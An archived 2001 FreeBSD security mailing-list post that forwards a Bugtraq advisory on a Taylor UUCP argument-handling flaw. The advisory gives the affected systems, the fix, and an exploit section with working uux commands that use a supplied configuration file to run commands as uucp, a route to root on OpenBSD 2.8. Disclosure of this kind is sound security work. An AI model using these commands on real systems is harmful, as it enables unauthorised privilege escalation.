Date: Sat, 08 Sep 2001 15:34:48 -0400 From: Mike Tancsa <mike@sentex.net> To: security@freebsd.org Subject: Fwd: Multiple vendor 'Taylor UUCP' problems. Message-ID: <5.1.0.14.0.20010908153417.0286b4b8@192.168.0.12>
next in thread | raw e-mail | index | archive | help
I imagine FreeBSD is vulnerable to this was well :-(
---Mike
>Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
>List-Id: <bugtraq.list-id.securityfocus.com>
>List-Post: <mailto:bugtraq@securityfocus.com>
>List-Help: <mailto:bugtraq-help@securityfocus.com>
>List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
>List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
>Delivered-To: mailing list bugtraq@securityfocus.com
>Delivered-To: moderator for bugtraq@securityfocus.com
>Date: Sat, 8 Sep 2001 22:58:39 +1200 (NZST)
>From: zen-parse <zen-parse@gmx.net>
>X-X-Sender: <zen-parse@clarity.local>
>To: <bugtraq@securityfocus.com>
>Subject: Multiple vendor 'Taylor UUCP' problems.
>
>******************* Brief description *************
>
> Due to incorrect argument handling in a component of the
> Taylor UUCP package, it is possible for local users to
> gain uid/gid uucp.
>
> This may allow further elevation, depending on the system,
> up to and including root access.
>
> On OpenBSD 2.8 (and probably others) it allows root compromise.
> By overwriting the uucp owned program /usr/bin/uustat, arbitrary
> commands may be executed as part of the /etc/daily crontab script.
>
> On Redhat 7.0 (and probably others) it allows creation of empty
> files as root, and the ability to execute commands as if logged
> in at the console (as checked via /lib/security/pam_console.so).
> This may also allow further elevation of privileges, or denial of
> service. (Tested against uucp-1.06.1-25)
>
> Other systems running this package are also affected to
> a greater or lesser degree.
>
>*********************** Solution ******************
>
>Patches should be available very soon, if not already, for most
>affected systems.
>
>If you do not require uucp functionality, you should remove the
>uucp packages from your system.
>
>********************** The Programs ***************
>
>uux (1) - Remote command execution over UUCP
> If you specify an alternative configuration, it will run as the user
> that called it, and pass the same configuration to uuxqt.
>
>uuxqt (1) - UUCP execution daemon
> Defaults to allowing rmail and uucp to be run, and nothing else,
> unless the configuration it is invoked with allows it to run other
> commands.
>
>uucp (1) - Unix to Unix copy
> If you specify an alternate configuration, it will also run as the user
> that called it.
>
> uuxqt checks the arguments for the programs it is asked to execute
> and gets rid of what it thinks are the potentially dangerous ones.
> However, it does not remove long arguments.
>
>******************** The Exploit ******************
>
>uux 'uucp -I/tmp/vv.v /tmp/somefile /tmp/someotherfile'
>
>will execute uucp, but will not use the /tmp/vv.v configuration file.
>
>However,
>
>uux 'uucp --config=/tmp/vv.v /tmp/somefile /tmp/someotherfile'
>
>will use the supplied configuration, without dropping privileges.
>
>1) Make a configuration file that allows any command to be executed, and
> allows files from anywhere to be copied to anywhere that is writable
> by uid/gid uucp. ( /tmp/config.uucp )
>2) Make a command file with the command you want to be executed.
> ( /tmp/commands.uucp )
>3) Do something like the following:
>
>$ THISHOST=`uuname -l`
>$ WHEREYOUWANTIT=/var/spool/uucp/${THISHOST}/X./X.${THISHOST}X1337
>$ uux 'uucp --config=/tmp/config.uucp /tmp/commands.uucp '${WHEREYOUWANTIT}
>
>The commands in /tmp/commands.uucp file will be executed by uuxqt, with
>the uid/gid of uucp.
>
>If you want to perform an exploit, and don't know what to put in the
>files, you should read the documentation for uucp.
>
>(Proof of concept root exploit for OpenBSD was performed on the wargame
>running OpenBSD 2.8 at damageinc.tv [ http://damageinc.tv ] )
>
>-- zen-parse
>
>===========================================================================
> http://mp3.com/cosv = Because %49%74%27%73%20%67%6f%6f%64%2e
> 'gone platinum' = Buy the CD that %74%6f%6f%6b%20%61%67%65%73
> = and %73%6f%75%6e%64%73%20%6f%6b
>===========================================================================
>
>-------------------------------------------------------------------------
>The preceding information is confidential and may not be redistributed
>without explicit permission. Legal action may be taken to enforce this.
>If this message was posted by zen-parse@gmx.net to a public forum it may
>be redistributed as long as these conditions remain attached. If you are
>mum or dad, this probably doesn't apply to you.
--------------------------------------------------------------------
Mike Tancsa, tel +1 519 651 3400
Sentex Communications, mike@sentex.net
Providing Internet since 1994 www.sentex.net
Cambridge, Ontario Canada www.sentex.net/mike
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?5.1.0.14.0.20010908153417.0286b4b8>